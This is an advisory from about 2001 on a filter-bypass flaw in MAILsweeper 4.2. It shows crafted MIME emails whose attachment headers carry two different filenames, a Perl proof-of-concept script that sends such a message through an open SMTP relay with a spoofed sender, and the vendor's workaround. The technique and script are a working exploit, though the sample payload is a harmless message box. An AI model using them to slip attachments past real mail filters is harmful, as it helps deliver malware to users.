COMMAND

    MAILsweeper

SYSTEMS AFFECTED

    MAILsweeper 4.2.* (not tested other e-mail content filtering systems)

PROBLEM

    Aidan O'Kelly found following.  Companies or organisations relying
    upon  MAILsweeper  or  other  email  content filtering systems, to
    protect  themselves  against  viruses  or malicious attachments by
    blocking e-mails via attachment filename.

    A  large  number  of  organisations  including  many  IT  Security
    companies  utilise  MAILsweeper   by  Content  Technologies   (now
    Baltimore)  to  protect  and  prevent  mailicious viruses and / or
    attachments from entering their networks.  However a situation has
    been brought to  our attention where  a malicious user  can bypass
    content filtering systems in place.

    When an administrator  sets up fileblocking  using a filter  (File
    Blocker), this restriction can be bypassed by malforming an e-mail
    attachment  header  to  trick  the  system into letting the e-mail
    through to the user.  This can lead to viruses and files that  the
    administrator would  like to  restrict, entering  the network  and
    possibly  leading  to  denial  of  service  and  data  destruction
    scenarios.

    When a user  sends an e-mail  to another user  with an attachment,
    the e-mail will include the mail headers, the body of the  e-mail,
    the  attachment  headers  and   the  attachment  (typically   MIME
    encoded):

        Return-Path: user_a@test.com
        From: User A <user_a@test.com>
        To: User B <user_b@test.com>
        Subject: Fw: FYI
        Date: Thurs, 22 Feb 2001 13:38:19 -0000
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.23)
        Content-Type: multipart/mixed ;
        boundary="----_=_NextPart_000_02D35B68.BA121FA3"
        Status: RO
        
        This message is in MIME format. Since your mail reader does not
        understand
        this format, some or all of this message may not be legible.
        
        ------_=_NextPart_000_02D35B68.BA121FA3
        Content-Type: text/plain; charset="iso-8859-1"
        
        Hi,
        
        Just popping a note to say hi!
        
        Cheers,
        
        User B.
        
        
        
        
        ------_=_NextPart_000_02D35B68.BA121FA3
        Content-Type: text/plain;
                name="virus.v*b*s"
        Content-Disposition: attachment;
                filename="virus.vbs"
        
        ' Test Virus
        ' Blah blah blah
        ' Do something devastating here!
        
        
        
        ------_=_NextPart_000_02D35B68.BA121FA3

    You will see from the attachment headers at the end of the  e-mail
    that the filename of the  attachment is defined twice.   The issue
    that  allows  a  malicious  e-mail  to  bypass  Mailsweeper's File
    Blocking, is  the blocking  agent only  checks the  first filename
    (set in  the Content-Type  line) against  the filter  set up by an
    administrator and  therefore ignores  the second  filename (set in
    the Content-Disposition line).

    The Outlook e-mail client uses  the second filename to define  the
    name of the attachment  to open / run.   Therefore it is  possible
    to malform an e-mail by changing the first filename definition  to
    a valid type that will not  be stopped by Mailsweeper.  If  a File
    Blocking  filter  is  in  place  to  block  all  attachments  with
    filenames  of  *.vb*,  the  above  e-mail  will  be  correctly and
    successfully blocked.   However, if  the second  e-mail is  passed
    through  the  Mailsweeper  system,  it  will  not  be  blocked and
    successfully delivered to the  user (assuming .doc files  are also
    not being blocked).

        Return-Path: user_a@test.com
        From: User A <user_a@test.com>
        To: User B <user_b@test.com>
        Subject: Fw: FYI
        Date: Thurs, 22 Feb 2001 13:38:19 -0000
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.23)
        Content-Type: multipart/mixed ;
        boundary="----_=_NextPart_000_02D35B68.BA121FA3"
        Status: RO
        
        This message is in MIME format. Since your mail reader does not
        understand
        this format, some or all of this message may not be legible.
        
        ------_=_NextPart_000_02D35B68.BA121FA3
        Content-Type: text/plain; charset="iso-8859-1"
        
        Hi,
        
        A note to say hi!
        
        Cheers,
        
        User B.
        
        
        
        
        ------_=_NextPart_000_02D35B68.BA121FA3
        Content-Type: text/plain;
                name="test.doc"
        Content-Disposition: attachment;
                filename="virus.vbs"
        
        ' Test Virus
        ' Blah blah blah
        ' Do something devastating here!
        
        
        
        ------_=_NextPart_000_02D35B68.BA121FA3

    msweep-fb.pl:

    #!/usr/bin/perl
    #
    # Usage: ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> <openrelay>	- Single instance using <openrelay>
    #        ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> -r			- Single instance using a random relay
    #        ./msweep-fb.pl -f <listofaddrs> <openrelay>       			- Send to / from a list of addresses (file) using <openrelay>
    #        ./msweep-fb.pl -f <listofaddrs> -r                			- Send to / from a list of addresses (file) using random relays
    #        ./msweep-fb.pl [--help|-h]                        			- Prints out this usage list
    #
    # Open relays courtesy of cyberarmy.com - NOT IMPLEMENTED YET (will I ever get time?)
    #
    # N.B. This is kwik and n45tY! (o)(o)
    #
    
    #
    # Libraries:
    #
    
    use IO::Socket;
    
    #
    # Constants:
    #
    
    $hstProto = "tcp";
    $hstPort = "25";
    $mailHELO = "HELO world";
    $mailFROM = "MAIL FROM: ";
    $mailRCPT = "RCPT TO: ";
    $mailDATA = "DATA\r";
    $mailTERM = "\r\n\r\n.\r";
    $mailQUIT = "QUIT\r";
    
    #
    #
    #
    
    if ( $ARGV[0] eq "-f" )
    {
	    print "WARNING! Not implemented yet\n";
    
    #        open ( INPUT,"$ARGV[1]",O_RDONLY ) or die "ERROR! Cannot open source file $ARGV[1]";
    #        @INPUT = <INPUT>;
    #
    #        foreach $line ( @INPUT )
    #        {
    #                chomp ( $line );
    #                if ( length ( $line ) > 1 )
    #                {
    #                }
    #        }
    #        close ( INPUT );
    #
    }
    elsif ( $ARGV[4] eq "-r" )
    {
	    print "WARNING! Not implemented yet\n";
    }
    elsif ( ( ( $ARGV[0] ne "--help" ) || ( $ARGV[0] ne "-h" ) ) && ( $ARGV[1] ne "" ) && ( $ARGV[2] ne "" ) && ( $ARGV[3] ne "" ) && ( $ARGV[4] ne "") )
    {
	    $hstRelay = $ARGV[4];
    
	    $sktMSweep = IO::Socket::INET-> new (PeerAddr => $hstRelay, PeerPort => $hstPort, Proto => $hstProto, Type => $hstStreamType)
        	                            or die "ERROR! Couldn't connect to $hstRelay : $hstPort - $@\n";
    
	    $sktReply = <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    $sktField = $mailHELO;
    
	    print "MSweep DEBUG: $sktField\n";
	    print $sktMSweep "$sktField\n";
	    $sktReply = <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    $sktField = "$mailFROM$ARGV[1]";
    
	    print "MSweep DEBUG: $sktField\n";
	    print $sktMSweep "$sktField\n";
	    $sktReply = <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    $sktField = "$mailRCPT$ARGV[3]";
    
	    print "MSweep DEBUG: $sktField\n";
	    print $sktMSweep "$sktField\n";
	    $sktReply = <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    $sktField = $mailDATA;
    
	    print "MSweep DEBUG: $sktField\n";
	    print $sktMSweep "$sktField\n";
    
	    print "MSweep DEBUG: Sending e-mail...\n";
	    print $sktMSweep <<end_of_mail;
    Return-Path: <$ARGV[1]>\r
    From: $ARGV[0] <$ARGV[1]>\r
    To: $ARGV[2] <$ARGV[3]>\r
    Subject: Fw: FYI\r
    Date: Mon, 19 Feb 2001 10:36:12 -0800\r
    MIME-Version: 1.0\r
    X-Mailer: Internet Mail Service (10.10.123)\r
    Content-Type: multipart/mixed ; =
    boundary="----_=_NextPart_000_01C09A86.DA181CF6"\r
    Status: RO\r
    \r
    This message is in MIME format. Since your mail reader does not understand\r
    this format, some or all of this message may not be legible.\r
    \r
    ------_=_NextPart_000_01C09A86.DA181CF6\r
    Content-Type: text/plain; charset="iso-8859-1"\r
    \r
    ---------- Forwarded message ----------\r
    \r
    Date: Thu, 15 Feb 2001 16:21:42 -0800\r
    From: Network Security Team \@ MIS <fake-mail-addr\@mis-cds.com>\r
    To: Unsuspecting user <unsuspecting.user\@test.com>\r
    Cc: Unsuspect user 2 <unsuspecting.user2\@test.org>\r
    Subject: Fw: Proof of concept for bypassing MailSweeper\r
    \r
    Hi,\r
    \r
    By double clicking on the attachment, a text box should appear. This is a proof of concept exploit for a vulnerability in MailSweeper's file content checking mechanisms.\r
    \r
    NST,\r
    MIS Corporate Defence Solutions Ltd.\r
    \r
    \r
    \r
    \r
    ------_=_NextPart_000_01C09A86.DA181CF6\r
    Content-Type: text/plain;\r
            name="test.doc"\r
    Content-Disposition: attachment;\r
            filename="test.txt.v*b*s"\r
    \r
    msgbox("MIS Corporate Defence Solutions has compromised your organisations e-mail content filtering systems. This is part of the ongoing Network Penetration Test by MIS. Please contact your Network Administrator or the MIS Network Security Team on nst\@mis-cds.com for further details")\r
    \r
    end_of_mail
    
	    print $sktMSweep "\r\n\r\n------_=_NextPart_000_01C09A86.DA181CF6\r\n";
    
	    print $sktMSweep "$mailTERM\n";
	    $sktReply = <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    $sktField = $mailQUIT;
    
	    print "MSweep DEBUG: $sktField\n";
	    print $sktMSweep "$sktField\n";
	    $sktReply  <$sktMSweep>;
	    print "MSweep DEBUG: $sktReply\n\n";
    
	    #Generate e-mail there
	    close ($sktMSweep);
    }
    else
    {
            print "Usage:\t./msweep-fb.pl <fromaddr> <toaddr> <openrelay>\t- Single instance using <openrelay>\n";
            print "\t./msweep-fb.pl <fromaddr> <toaddr> -r\t\t- Single instance using a random relay\n";
            print "\t./msweep-fb.pl -f <listofaddrs> <openrelay>\t- Send to / from a list of addresses (file) using <openrelay>\n";
            print "\t./msweep-fb.pl -f <listofaddrs> -r\t\t\t- Send to / from a list of addresses (file) using random relays\n";
            print "\t./msweep-fb.pl [--help|-h]\t\t\t\t- Prints out this usage list\n";
    }
    
    exit();

SOLUTION

    Baltimore has released  a workaround and  utility to help  prevent
    this  issue  from  being  exploited.   Please  use  the "Data Type
    Manager" where  applicable and  install the  script.exe utility to
    check for malicious threats (available from:

        http://www.contenttechnologies.com/download/extras/free_utilities.asp#Script%20Tool).